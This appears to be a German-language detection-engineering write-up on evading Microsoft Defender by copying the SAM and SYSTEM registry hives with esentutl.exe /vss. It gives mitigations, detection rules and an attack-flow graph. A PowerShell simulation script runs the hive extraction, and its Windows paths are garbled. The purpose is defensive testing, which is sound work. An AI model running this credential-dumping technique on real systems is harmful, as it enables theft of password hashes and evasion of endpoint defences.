Der Monat der Umgehungen: Was Defender übersieht
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Das Persistent Security-Team beschreibt eine neue Methode, um die Erkennung der Anmeldedaten-Dumping-Technik T1003.002 zu umgehen, indem das signierte Windows-Dienstprogramm esentutl.exemissbraucht wird. Durch die Verwendung von VSS-bezogenen Flags kann das Tool die SAM and SYSTEM -Registrierungsknoten kopieren, ohne Microsoft Defender auf die gleiche Weise wie bei gebräuchlicheren Dump-Methoden auszulösen.
Untersuchung
Die Forscher testeten drei traditionelle Ansätze zum Dumping der Registrierungsknoten, einschließlich reg save, vssadmin Schattenkopien und direkte Dateikopien, und stellten fest, dass jeder von ihnen von Defender blockiert wurde. Anschließend verwendeten sie AI-gesteuertes Variantentesten, um einen alternativen Pfad zu identifizieren: esentutl.exe konnte die Knoten über die eingebaute VSS-Funktionalität darauf zugreifen und extrahieren, während bestehende Defender-Erkennungen umgangen wurden.
Minderung
Empfohlene Abwehrmaßnahmen umfassen die Einschränkung von esentutl.exe über AppLocker oder WDAC, die Erstellung von Sysmon-Regeln zur Erkennung von esentutl -Ausführungen, die das /vss Flag verwenden, und die Überwachung von Schattenkopieaktivitäten, die außerhalb normalen Systemverhaltens initiiert werden. Organisationen sollten zudem LAPS für lokale Administratorenkonten bereitstellen und VSS deaktivieren, wo es nicht operationell benötigt wird.
Reaktion
If esentutl.exe wird beobachtet, wenn es mit dem /vss Flag ausgeführt wird und auf Dateien zugreift, die mit SAM or SYSTEMin Verbindung stehen, sollten Verteidiger den betroffenen Host isolieren, Speicher- und Registrierungsevidenz sammeln, bestätigen, ob ein Anmeldedaten-Dumping stattgefunden hat, und die empfohlenen Richtlinienkontrollen anwenden, um ein Wiederauftreten zu verhindern.
graph TB %% Class Definitions classDef action fill:#99ccff classDef builtin fill:#cccccc classDef file fill:#ffdd99 %% Nodes action_esentutl_exec[„<b>Aktion</b> – <b>T1218.002 Proxy-Ausführung von Systembinärdateien</b><br/>Ausführen von esentutl.exe mit den Parametern /y /vss zur Erstellung einer Volume Shadow Copy“] class action_esentutl_exec action tool_esentutl[„<b>Tool</b> – <b>Name</b>: esentutl.exe<br/><b>Beschreibung</b>: Internes Windows-Dienstprogramm zur Verwaltung der Extensible Storage Engine“] class tool_esentutl builtin action_copy_hives[„<b>Aktion</b> – <b>T1003 OS Credential Dumping</b><br/>Kopieren der SAM- und SYSTEM-Hive-Dateien aus der Schattenkopie an einen beschreibbaren Ort“] class action_copy_hives action action_store_unsecured[„<b>Aktion</b> – <b>T1552.001 Anmeldeinformationen in Dateien</b><br/>Speichern der extrahierten Hive-Dateien auf der Festplatte zur späteren Offline-Analyse“] class action_store_unsecured action file_sam[„<b>Datei</b> – sam_dump<br/><b>Inhalt</b>: SAM-Hive mit Passwort-Hashes“] class file_sam file file_sys[„<b>Datei</b> – sys_dump<br/><b>Inhalt</b>: SYSTEM-Hive mit System-Bootschlüssel“] class file_sys file %% Connections action_esentutl_exec –>|uses| tool_esentutl action_esentutl_exec –>|leads_to| action_copy_hives action_copy_hives –>|uses| tool_esentutl action_copy_hives –>|creates| file_sam action_copy_hives –>|creates| file_sys file_sam –>|used_by| action_store_unsecured file_sys –>|used_by| action_store_unsecured
Angriffsablauf
Erkennungen
LOLBAS Esentutl (über cmdline)
Ansicht
Verdächtige VSSADMIN-Aktivität (über cmdline)
Ansicht
Mögliches SAM/SYSTEM/SECURITY-Dumping (über cmdline)
Ansicht
Verdächtiges Kopieren von SAM/SECURITY/NTDS.dit über Schattenkopie (über cmdline)
Ansicht
Erkennung der Ausführung von Esentutl mit VSS zum Umgehen des SAM-Hive [Windows Sysmon]
Ansicht
Umgehung der SAM-Hive-Extraktion über Esentutl und WMI-Schattenkopie [Windows Prozess-Erstellung]
Ansicht
Simulation Ausführung
Voraussetzung: Der Telemetrie- & Basislinien-Vorflugcheck muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Gegnertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffsbericht & Befehle:
Ein Angreifer, der sich Zugang zu einem kompromittierten Windows-Host verschafft hat, möchte Anmeldeinformationen ernten, ohne die üblichen Tools zur Anmeldedaten-Dump-Erkennung auszulösen, die häufig überwacht werden. Der Angreifer nutzt das eingebauteesentutl.exeBinary mit dem/vssSchalter, um eine Schattenkopie des Systemvolumens zu erstellen und den geschützten SAM-Hive zu extrahieren. Die Schritte sind:- Erstellen Sie ein temporäres Verzeichnis für den Snapshot-Export.
- Aufruf von
esentutl.exemit den/y(überschreiben) und/vssFlags, wobei der SAM-Hive-Pfad anvisiert wird. - Kopieren Sie die exportierte SAM-Datei an einen vom Angreifer kontrollierten Ort.
- (Optional) Säubern Sie die temporäre Snapshot-Datei, um den forensischen Fußabdruck zu reduzieren.
Diese Sequenz erzeugt ein Sysmon ProcessCreate-Ereignis, bei dem
Bildendet mitesentutl.exeandBefehlszeileenthält die Zeichenfolge/vss, wodurch die Erkennungsregel erfüllt wird. -
Regressionstest-Skript:
# ---------------------------------------------- # Simulation der VSS-basierten SAM-Extraktion mit esentutl # ---------------------------------------------- $tempDir = "$env:TEMPVSS_Export" New-Item -ItemType Directory -Path $tempDir -Force | Out-Null # Pfad zum SAM-Knoten (schreibgeschütztes Kopie wird exportiert) $samHive = "$env:SystemRootSystem32configSAM" $outputFile = Join-Path $tempDir "SAM_copy.edb" # Ausführung von esentutl mit VSS zum Export des SAM-Knotens $esentPath = "$env:SystemRootSystem32esentutl.exe" $arguments = "/y /vss `"$samHive`" `"$outputFile`"" Write-Host "Läuft: $esentPath $arguments" & $esentPath $arguments # Überprüfen, ob der Export erfolgreich war if (Test-Path $outputFile) { Write-Host "SAM-Knoten exportiert nach $outputFile" } else { Write-Warning "Export fehlgeschlagen oder keine Datei erstellt." } # Bereinigen der Snapshot-Datei (optional, hängt vom OS-Verhalten ab) # Hinweis: VSS-Snapshot-Dateien werden in der Regel nach dem Export automatisch gelöscht. -
Bereinigungskommandos:
# Entfernen von temporären Exportverzeichnissen und -dateien $tempDir = "$env:TEMPVSS_Export" if (Test-Path $tempDir) { Remove-Item -Recurse -Force -Path $tempDir Write-Host "Bereinigung abgeschlossen: $tempDir entfernt." } else { Write-Host "Keine Bereinigung erforderlich; Verzeichnis nicht gefunden."